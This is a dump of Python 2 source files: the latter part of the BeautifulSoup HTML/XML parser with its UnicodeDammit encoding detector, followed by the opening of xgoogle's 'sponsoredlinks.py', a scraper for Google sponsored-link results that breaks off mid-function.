None if convertEntities == self.HTML_ENTITIES: self.convertXMLEntities = False self.convertHTMLEntities = True self.escapeUnrecognizedEntities = True elif convertEntities == self.XHTML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = True self.escapeUnrecognizedEntities = False elif convertEntities == self.XML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False else: self.convertXMLEntities = False self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() self.markup = markup self.markupMassage = markupMassage try: self._feed() except StopParsing: pass self.markup = None # The markup can now be GCed def convert_charref(self, name): """This method fixes a bug in Python's SGMLParser.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127 : # ASCII ends at 127, not 255 return return self.convert_codepoint(n) def _feed(self, inDocumentEncoding=None): # Convert the document to Unicode. markup = self.markup if isinstance(markup, unicode): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: dammit = UnicodeDammit\ (markup, [self.fromEncoding, inDocumentEncoding], smartQuotesTo=self.smartQuotesTo) markup = dammit.unicode self.originalEncoding = dammit.originalEncoding if markup: if self.markupMassage: if not isList(self.markupMassage): self.markupMassage = self.MARKUP_MASSAGE for fix, m in self.markupMassage: markup = fix.sub(m, markup) # TODO: We get rid of markupMassage so that the # soup object can be deepcopied later on. Some # Python installations can't copy regexes. 
If anyone # was relying on the existence of markupMassage, this # might cause problems. del(self.markupMassage) self.reset() SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: self.popTag() def __getattr__(self, methodName): """This method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.""" #print "__getattr__ called on %s.%s" % (self.__class__, methodName) if methodName.find('start_') == 0 or methodName.find('end_') == 0 \ or methodName.find('do_') == 0: return SGMLParser.__getattr__(self, methodName) elif methodName.find('__') != 0: return Tag.__getattr__(self, methodName) else: raise AttributeError def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" return self.SELF_CLOSING_TAGS.has_key(name) \ or self.instanceSelfClosingTags.has_key(name) def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] self.quoteStack = [] self.pushTag(self) def popTag(self): tag = self.tagStack.pop() # Tags with just one string-owning child get the child as a # 'string' property, so that soup.tag.string is shorthand for # soup.tag.contents[0] if len(self.currentTag.contents) == 1 and \ isinstance(self.currentTag.contents[0], NavigableString): self.currentTag.string = self.currentTag.contents[0] #print "Pop", tag.name if self.tagStack: self.currentTag = self.tagStack[-1] return self.currentTag def pushTag(self, tag): #print "Push", tag.name if self.currentTag: self.currentTag.contents.append(tag) self.tagStack.append(tag) self.currentTag = self.tagStack[-1] def endData(self, containerClass=NavigableString): if self.currentData: currentData = ''.join(self.currentData) if not currentData.translate(self.STRIP_ASCII_SPACES): if '\n' in currentData: currentData = '\n' else: currentData = ' ' self.currentData = [] if self.parseOnlyThese and len(self.tagStack) <= 1 and \ (not self.parseOnlyThese.text or \ not self.parseOnlyThese.search(currentData)): return o = containerClass(currentData) o.setup(self.currentTag, self.previous) if self.previous: self.previous.next = o self.previous = o self.currentTag.contents.append(o) def _popToTag(self, name, inclusivePop=True): """Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.""" #print "Popping to %s" % name if name == self.ROOT_TAG_NAME: return numPops = 0 mostRecentTag = None for i in range(len(self.tagStack)-1, 0, -1): if name == self.tagStack[i].name: numPops = len(self.tagStack)-i break if not inclusivePop: numPops = numPops - 1 for i in range(0, numPops): mostRecentTag = self.popTag() return mostRecentTag def _smartPop(self, name): """We need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. 
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' """ nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None isResetNesting = self.RESET_NESTING_TAGS.has_key(name) popTo = None inclusive = True for i in range(len(self.tagStack)-1, 0, -1): p = self.tagStack[i] if (not p or p.name == name) and not isNestable: #Non-nestable tags get popped to the top or to their #last occurance. popTo = name break if (nestingResetTriggers != None and p.name in nestingResetTriggers) \ or (nestingResetTriggers == None and isResetNesting and self.RESET_NESTING_TAGS.has_key(p.name)): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag #that causes nesting to reset, pop up to but not #including that tag. popTo = p.name inclusive = False break p = p.parent if popTo: self._popToTag(popTo, inclusive) def unknown_starttag(self, name, attrs, selfClosing=0): #print "Start tag %s: %s" % (name, attrs) if self.quoteStack: #This is not a real tag. #print "<%s> is not real!" % name attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs)) self.handle_data('<%s%s>' % (name, attrs)) return self.endData() if not self.isSelfClosingTag(name) and not selfClosing: self._smartPop(name) if self.parseOnlyThese and len(self.tagStack) <= 1 \ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): return tag = Tag(self, name, attrs, self.currentTag, self.previous) if self.previous: self.previous.next = tag self.previous = tag self.pushTag(tag) if selfClosing or self.isSelfClosingTag(name): self.popTag() if name in self.QUOTE_TAGS: #print "Beginning quote (%s)" % name self.quoteStack.append(name) self.literal = 1 return tag def unknown_endtag(self, name): #print "End tag %s" % name if self.quoteStack and self.quoteStack[-1] != name: #This is not a real end tag. #print "</%s> is not real!" % name self.handle_data('</%s>' % name) return self.endData() self._popToTag(name) if self.quoteStack and self.quoteStack[-1] == name: self.quoteStack.pop() self.literal = (len(self.quoteStack) > 0) def handle_data(self, data): self.currentData.append(data) def _toStringSubclass(self, text, subclass): """Adds a certain piece of text to the tree as a NavigableString subclass.""" self.endData() self.handle_data(text) self.endData(subclass) def handle_pi(self, text): """Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.""" if text[:3] == "xml": text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" self._toStringSubclass(text, ProcessingInstruction) def handle_comment(self, text): "Handle comments as Comment objects." self._toStringSubclass(text, Comment) def handle_charref(self, ref): "Handle character references as data." if self.convertEntities: data = unichr(int(ref)) else: data = '&#%s;' % ref self.handle_data(data) def handle_entityref(self, ref): """Handle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.""" data = None if self.convertHTMLEntities: try: data = unichr(name2codepoint[ref]) except KeyError: pass if not data and self.convertXMLEntities: data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) if not data and self.convertHTMLEntities and \ not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): # TODO: We've got a problem here. 
We're told this is # an entity reference, but it's not an XML entity # reference or an HTML entity reference. Nonetheless, # the logical thing to do is to pass it through as an # unrecognized entity reference. # # Except: when the input is "&carol;" this function # will be called with input "carol". When the input is # "AT&T", this function will be called with input # "T". We have no way of knowing whether a semicolon # was present originally, so we don't know whether # this is an unknown entity or just a misplaced # ampersand. # # The more common case is a misplaced ampersand, so I # escape the ampersand and omit the trailing semicolon. data = "&amp;%s" % ref if not data: # This case is different from the one above, because we # haven't already gone through a supposedly comprehensive # mapping of entities to Unicode characters. We might not # have gone through any mapping at all. So the chances are # very high that this is a real entity, and not a # misplaced ampersand. data = "&%s;" % ref self.handle_data(data) def handle_decl(self, data): "Handle DOCTYPEs and the like as Declaration objects." self._toStringSubclass(data, Declaration) def parse_declaration(self, i): """Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.""" j = None if self.rawdata[i:i+9] == '<![CDATA[': k = self.rawdata.find(']]>', i) if k == -1: k = len(self.rawdata) data = self.rawdata[i+9:k] j = k+3 self._toStringSubclass(data, CData) else: try: j = SGMLParser.parse_declaration(self, i) except SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) return j class BeautifulSoup(BeautifulStoneSoup): """This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. 
If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): if not kwargs.has_key('smartQuotesTo'): kwargs['smartQuotesTo'] = self.HTML_ENTITIES BeautifulStoneSoup.__init__(self, *args, **kwargs) SELF_CLOSING_TAGS = buildTagMap(None, ['br' , 'hr', 'input', 'img', 'meta', 'spacer', 'link', 'frame', 'base']) QUOTE_TAGS = {'script' : None, 'textarea' : None} #According to the HTML standard, each of these inline tags can #contain another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', 'center'] #According to the HTML standard, these block tags can contain #another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del'] #Lists can contain other lists, but there are restrictions. NESTABLE_LIST_TAGS = { 'ol' : [], 'ul' : [], 'li' : ['ul', 'ol'], 'dl' : [], 'dd' : ['dl'], 'dt' : ['dl'] } #Tables can contain other tables, but there are restrictions. NESTABLE_TABLE_TAGS = {'table' : [], 'tr' : ['table', 'tbody', 'tfoot', 'thead'], 'td' : ['tr'], 'th' : ['tr'], 'thead' : ['table'], 'tbody' : ['table'], 'tfoot' : ['table'], } NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre'] #If one of these tags is encountered, all tags up to the next tag of #this type are popped. RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', NON_NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)") def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.""" httpEquiv = None contentType = None contentTypeIndex = None tagNeedsEncodingSubstitution = False for i in range(0, len(attrs)): key, value = attrs[i] key = key.lower() if key == 'http-equiv': httpEquiv = value elif key == 'content': contentType = value contentTypeIndex = i if httpEquiv and contentType: # It's an interesting meta tag. match = self.CHARSET_RE.search(contentType) if match: if getattr(self, 'declaredHTMLEncoding') or \ (self.originalEncoding == self.fromEncoding): # This is our second pass through the document, or # else an encoding was specified explicitly and it # worked. Rewrite the meta tag. newAttr = self.CHARSET_RE.sub\ (lambda(match):match.group(1) + "%SOUP-ENCODING%", contentType) attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], newAttr) tagNeedsEncodingSubstitution = True else: # This is our first pass through the document. # Go through it again with the new information. newCharset = match.group(3) if newCharset and newCharset != self.originalEncoding: self.declaredHTMLEncoding = newCharset self._feed(self.declaredHTMLEncoding) raise StopParsing tag = self.unknown_starttag("meta", attrs) if tag and tagNeedsEncodingSubstitution: tag.containsSubstitutions = True class StopParsing(Exception): pass class ICantBelieveItsBeautifulSoup(BeautifulSoup): """The BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. 
For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.""" I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', 'big'] I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript'] NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) class MinimalSoup(BeautifulSoup): """The MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.""" RESET_NESTING_TAGS = buildTagMap('noscript') NESTABLE_TAGS = {} class BeautifulSOAP(BeautifulStoneSoup): """This class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.""" def popTag(self): if len(self.tagStack) > 1: tag = self.tagStack[-1] parent = self.tagStack[-2] parent._getAttrMap() if (isinstance(tag, Tag) and len(tag.contents) == 1 and isinstance(tag.contents[0], NavigableString) and not parent.attrMap.has_key(tag.name)): parent[tag.name] = tag.contents[0] BeautifulStoneSoup.popTag(self) #Enterprise class names! It has come to our attention that some people #think the names of the Beautiful Soup parser classes are too silly #and "unprofessional" for use in enterprise screen-scraping. We feel #your pain! 
For such-minded folk, the Beautiful Soup Consortium And #All-Night Kosher Bakery recommends renaming this file to #"RobustParser.py" (or, in cases of extreme enterprisiness, #"RobustParserBeanInterface.class") and using the following #enterprise-friendly class aliases: class RobustXMLParser(BeautifulStoneSoup): pass class RobustHTMLParser(BeautifulSoup): pass class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): pass class RobustInsanelyWackAssHTMLParser(MinimalSoup): pass class SimplifyingSOAPParser(BeautifulSOAP): pass ###################################################### # # Bonus library: Unicode, Dammit # # This class forces XML data into a standard format (usually to UTF-8 # or Unicode). It is heavily based on code from Mark Pilgrim's # Universal Feed Parser. It does not rewrite the XML or HTML to # reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi # (XML) and BeautifulSoup.start_meta (HTML). # Autodetects character encodings. # Download from http://chardet.feedparser.org/ try: import chardet # import chardet.constants # chardet.constants._debug = 1 except ImportError: chardet = None # cjkcodecs and iconv_codec make Python know about more character encodings. # Both are available from http://cjkpython.i18n.org/ # They're built in if you use Python 2.4. try: import cjkcodecs.aliases except ImportError: pass try: import iconv_codec except ImportError: pass class UnicodeDammit: """A class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.""" # This dictionary maps commonly seen values for "charset" in HTML # meta tags to the corresponding Python codec names. It only covers # values that aren't in Python's aliases and can't be determined # by the heuristics in find_codec. CHARSET_ALIASES = { "macintosh" : "mac-roman", "x-sjis" : "shift-jis" } def __init__(self, markup, overrideEncodings=[], smartQuotesTo='xml'): self.markup, documentEncoding, sniffedEncoding = \ self._detectEncoding(markup) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] if markup == '' or isinstance(markup, unicode): self.originalEncoding = None self.unicode = unicode(markup) return u = None for proposedEncoding in overrideEncodings: u = self._convertFrom(proposedEncoding) if u: break if not u: for proposedEncoding in (documentEncoding, sniffedEncoding): u = self._convertFrom(proposedEncoding) if u: break # If no luck and we have auto-detection library, try that: if not u and chardet and not isinstance(self.markup, unicode): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: if not u: for proposed_encoding in ("utf-8", "windows-1252"): u = self._convertFrom(proposed_encoding) if u: break self.unicode = u if not u: self.originalEncoding = None def _subMSChar(self, orig): """Changes a MS smart quote character to an XML or HTML entity.""" sub = self.MS_CHARS.get(orig) if type(sub) == types.TupleType: if self.smartQuotesTo == 'xml': sub = '&#x%s;' % sub[1] else: sub = '&%s;' % sub[0] return sub def _convertFrom(self, proposed): proposed = self.find_codec(proposed) if not proposed or proposed in self.triedEncodings: return None self.triedEncodings.append(proposed) markup = self.markup # Convert smart quotes to HTML if coming from an encoding # that might have them. 
if self.smartQuotesTo and proposed.lower() in("windows-1252", "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ (lambda(x): self._subMSChar(x.group(1)), markup) try: # print "Trying to convert document to %s" % proposed u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed except Exception, e: # print "That didn't work!" # print e return None #print "Correct encoding: %s" % proposed return self.markup def _toUnicode(self, data, encoding): '''Given a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliases''' # strip Byte Order Mark (if present) if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16be' data = data[2:] elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16le' data = data[2:] elif data[:3] == '\xef\xbb\xbf': encoding = 'utf-8' data = data[3:] elif data[:4] == '\x00\x00\xfe\xff': encoding = 'utf-32be' data = data[4:] elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] newdata = unicode(data, encoding) return newdata def _detectEncoding(self, xml_data): """Given a document, tries to detect its XML encoding.""" xml_encoding = sniffed_xml_encoding = None try: if xml_data[:4] == '\x4c\x6f\xa7\x94': # EBCDIC xml_data = self._ebcdic_to_ascii(xml_data) elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass xml_encoding_match = re.compile \ ('^<\?.*encoding=[\'"](.*?)[\'"].*\?>')\ .match(xml_data) except: xml_encoding_match = None if xml_encoding_match: xml_encoding = xml_encoding_match.groups()[0].lower() if sniffed_xml_encoding and \ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', 'iso-10646-ucs-4', 'ucs-4', 'csucs4', 'utf-16', 'utf-32', 'utf_16', 'utf_32', 'utf16', 'u16')): xml_encoding = sniffed_xml_encoding return xml_data, xml_encoding, sniffed_xml_encoding def find_codec(self, charset): return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ or (charset and self._codec(charset.replace("-", ""))) \ or (charset and 
self._codec(charset.replace("-", "_"))) \ or charset def _codec(self, charset): if not charset: return charset codec = None try: codecs.lookup(charset) codec = charset except (LookupError, ValueError): pass return codec EBCDIC_TO_ASCII_MAP = None def _ebcdic_to_ascii(self, s): c = self.__class__ if not c.EBCDIC_TO_ASCII_MAP: emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15, 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31, 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7, 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26, 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33, 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94, 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63, 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34, 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200, 201,202,106,107,108,109,110,111,112,113,114,203,204,205, 206,207,208,209,126,115,116,117,118,119,120,121,122,210, 211,212,213,214,215,216,217,218,219,220,221,222,223,224, 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72, 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81, 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89, 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57, 250,251,252,253,254,255) import string c.EBCDIC_TO_ASCII_MAP = string.maketrans( \ ''.join(map(chr, range(256))), ''.join(map(chr, emap))) return s.translate(c.EBCDIC_TO_ASCII_MAP) MS_CHARS = { '\x80' : ('euro', '20AC'), '\x81' : ' ', '\x82' : ('sbquo', '201A'), '\x83' : ('fnof', '192'), '\x84' : ('bdquo', '201E'), '\x85' : ('hellip', '2026'), '\x86' : ('dagger', '2020'), '\x87' : ('Dagger', '2021'), '\x88' : ('circ', '2C6'), '\x89' : ('permil', '2030'), '\x8A' : ('Scaron', '160'), '\x8B' : ('lsaquo', '2039'), '\x8C' : ('OElig', '152'), '\x8D' : '?', '\x8E' : ('#x17D', '17D'), '\x8F' : '?', '\x90' : '?', '\x91' : ('lsquo', '2018'), '\x92' : ('rsquo', '2019'), '\x93' : ('ldquo', '201C'), '\x94' : ('rdquo', '201D'), '\x95' : ('bull', '2022'), '\x96' : ('ndash', '2013'), '\x97' : ('mdash', '2014'), '\x98' : ('tilde', '2DC'), '\x99' : ('trade', '2122'), '\x9a' : ('scaron', '161'), '\x9b' : ('rsaquo', '203A'), '\x9c' : ('oelig', '153'), '\x9d' : '?', '\x9e' : ('#x17E', '17E'), '\x9f' : ('Yuml', ''),} ####################################################################### #By default, act as an HTML pretty-printer. if __name__ == '__main__': import sys soup = BeautifulSoup(sys.stdin.read()) print soup.prettify()
76,364
Python
.py
1,672
34.244617
186
0.583169
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
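BeautifulSoup.py above is the parser every other xgoogle module leans on. A short usage sketch against the API shown in that source (Python 2; the sample markup is invented for illustration):

from BeautifulSoup import BeautifulSoup

html = '<div class="g"><a href="http://example.com">Example</a></div>'
soup = BeautifulSoup(html)

# find()/findAll() take a tag name plus an attribute map (see Tag.findAll).
div = soup.find('div', {'class': 'g'})
link = div.find('a')
print link['href']                       # attribute access via Tag.__getitem__
print ''.join(link.findAll(text=True))   # collect the NavigableString children

# Tags render back to markup; prettify() is the indenting renderer that the
# module's __main__ block uses as an HTML pretty-printer.
print soup.prettify()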
18,918
sponsoredlinks.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/sponsoredlinks.py
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/
#
# Code is licensed under MIT license.
#

import re
import urllib
import random

from htmlentitydefs import name2codepoint

from BeautifulSoup import BeautifulSoup
from browser import Browser, BrowserError

#
# TODO: join GoogleSearch and SponsoredLinks classes under a single base class
#

class SLError(Exception):
    """ Sponsored Links Error """
    pass

class SLParseError(Exception):
    """
    Parse error in Google results.
    self.msg attribute contains explanation why parsing failed
    self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse
    Thrown only in debug mode
    """
    def __init__(self, msg, tag):
        self.msg = msg
        self.tag = tag

    def __str__(self):
        return self.msg

    def html(self):
        return self.tag.prettify()

GET_ALL_SLEEP_FUNCTION = object()

class SponsoredLink(object):
    """ a single sponsored link """
    def __init__(self, title, url, display_url, desc):
        self.title = title
        self.url = url
        self.display_url = display_url
        self.desc = desc

class SponsoredLinks(object):
    SEARCH_URL_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&btnG=Search+Sponsored+Links&hl=en"
    NEXT_PAGE_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&sa=N&start=%(start)d&hl=en"
    SEARCH_URL_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&btnG=Search+Sponsored+Links&hl=en"
    NEXT_PAGE_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&sa=N&start=%(start)d&hl=en"

    def __init__(self, query, random_agent=False, debug=False):
        self.query = query
        self.debug = debug
        self.browser = Browser(debug=debug)
        self._page = 0
        self.eor = False
        self.results_info = None
        self._results_per_page = 10

        if random_agent:
            self.browser.set_random_user_agent()

    @property
    def num_results(self):
        if not self.results_info:
            page = self._get_results_page()
            self.results_info = self._extract_info(page)
            if self.results_info['total'] == 0:
                self.eor = True
        return self.results_info['total']

    def _get_results_per_page(self):
        return self._results_per_page

    def _set_results_par_page(self, rpp):
        self._results_per_page = rpp

    results_per_page = property(_get_results_per_page, _set_results_par_page)

    def get_results(self):
        if self.eor:
            return []
        page = self._get_results_page()
        info = self._extract_info(page)
        if self.results_info is None:
            self.results_info = info
        if info['to'] == info['total']:
            self.eor = True
        results = self._extract_results(page)
        if not results:
            self.eor = True
            return []
        self._page += 1
        return results

    def _get_all_results_sleep_fn(self):
        return random.random()*5 + 1 # sleep from 1 - 6 seconds

    def get_all_results(self, sleep_function=None):
        if sleep_function is GET_ALL_SLEEP_FUNCTION:
            sleep_function = self._get_all_results_sleep_fn
        if sleep_function is None:
            sleep_function = lambda: None
        ret_results = []
        while True:
            res = self.get_results()
            if not res:
                return ret_results
            ret_results.extend(res)
        return ret_results

    def _maybe_raise(self, cls, *arg):
        if self.debug:
            raise cls(*arg)

    def _extract_info(self, soup):
        empty_info = { 'from': 0, 'to': 0, 'total': 0 }
        stats_span = soup.find('span', id='stats')
        if not stats_span:
            return empty_info
        txt = ''.join(stats_span.findAll(text=True))
        txt = txt.replace(',', '').replace("&nbsp;", ' ')
        matches = re.search(r'Results (\d+) - (\d+) of (?:about )?(\d+)', txt)
        if not matches:
            return empty_info
        return {'from': int(matches.group(1)), 'to': int(matches.group(2)), 'total': int(matches.group(3))}

    def _get_results_page(self):
        if self._page == 0:
            if self._results_per_page == 10:
                url = SponsoredLinks.SEARCH_URL_0
            else:
                url = SponsoredLinks.SEARCH_URL_1
        else:
            if self._results_per_page == 10:
                url = SponsoredLinks.NEXT_PAGE_0
            else:
                url = SponsoredLinks.NEXT_PAGE_1

        safe_url = url % { 'query': urllib.quote_plus(self.query),
                           'start': self._page * self._results_per_page,
                           'num': self._results_per_page }

        try:
            page = self.browser.get_page(safe_url)
        except BrowserError, e:
            raise SLError, "Failed getting %s: %s" % (e.url, e.error)

        return BeautifulSoup(page)

    def _extract_results(self, soup):
        results = soup.findAll('div', {'class': 'g'})
        ret_res = []
        for result in results:
            eres = self._extract_result(result)
            if eres:
                ret_res.append(eres)
        return ret_res

    def _extract_result(self, result):
        title, url = self._extract_title_url(result)
        display_url = self._extract_display_url(result)
        # Warning: removes 'cite' from the result
        desc = self._extract_description(result)
        if not title or not url or not display_url or not desc:
            return None
        return SponsoredLink(title, url, display_url, desc)

    def _extract_title_url(self, result):
        title_a = result.find('a')
        if not title_a:
